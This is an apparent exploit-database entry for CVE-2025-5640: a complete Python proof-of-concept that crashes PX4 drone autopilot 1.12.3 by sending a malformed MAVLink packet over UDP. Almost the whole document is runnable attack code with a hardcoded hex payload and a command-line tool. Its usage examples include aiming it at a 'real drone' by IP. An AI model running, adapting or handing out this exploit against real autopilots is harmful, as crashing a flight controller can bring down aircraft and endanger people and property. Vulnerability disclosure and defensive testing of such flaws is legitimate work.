PX4 Military UAV Autopilot 1.12.3 – Denial of Service (DoS)

# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-21
# Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim)
# CVE: CVE-2025-5640
# Type: Denial of Service (DoS) via Buffer Overflow
# Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station)
# Author Country: Jordan
# Description:
#   A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered
#   when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS.
#   An attacker with access to the MAVLink communication channel can send a crafted packet
#   to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates
#   a proof-of-concept that causes the PX4 autopilot to crash via UDP.


import argparse
import binascii
from pymavlink import mavutil
import sys

# Exploit payload (malformed MAVLink hex)
hex_payload = (
    "fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352"
    "c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78"
    "12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6"
)

def connect_to_px4(ip, port, timeout, verbose=False):
    try:
        if verbose:
            print(f"[*] Connecting to PX4 at udp:{ip}:{port} ...")
        master = mavutil.mavlink_connection(f"udp:{ip}:{port}")
        master.wait_heartbeat(timeout=timeout)
        if verbose:
            print("[+] PX4 heartbeat received. Connection OK.")
        return master
    except Exception as e:
        print(f"[!] Error connecting to PX4: {e}")
        sys.exit(1)

def send_dos_packet(master, verbose=False):
    try:
        payload = binascii.unhexlify(hex_payload)
        master.write(payload)
        print("[+] Exploit packet sent. Monitor PX4 for crash.")
    except Exception as e:
        print(f"[!] Failed to send payload: {e}")
        sys.exit(1)

def main():
    usage = """
    PX4 Exploit Tool - CVE-2025-5640
    =================================
    Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink.

    USAGE:
        python3 px4_exploit_tool.py [OPTIONS]

    EXAMPLES:
        # Run DoS attack on default PX4 SITL
        python3 px4_exploit_tool.py --mode dos

        # Test connectivity to a real drone
        python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550

    OPTIONS:
        --ip        Target IP address (default: 127.0.0.1)
        --port      Target UDP port (default: 14540)
        --mode      Mode of operation: dos (default), check
        --timeout   Timeout in seconds for heartbeat (default: 5)
        --verbose   Enable verbose output
    """
    parser = argparse.ArgumentParser(
        description="PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security",
        epilog=usage,
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    parser.add_argument("--ip", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)")
    parser.add_argument("--port", type=int, default=14540, help="Target UDP port (default: 14540)")
    parser.add_argument("--timeout", type=int, default=5, help="Timeout in seconds for heartbeat (default: 5)")
    parser.add_argument("--mode", choices=["dos", "check"], default="dos", help="Mode: dos (default) or check connection")
    parser.add_argument("--verbose", action="store_true", help="Enable verbose output")

    args = parser.parse_args()

    master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose)

    if args.mode == "check":
        print("[*] PX4 is alive. Connection test passed.")
    elif args.mode == "dos":
        send_dos_packet(master, args.verbose)


if __name__ == "__main__":
    main()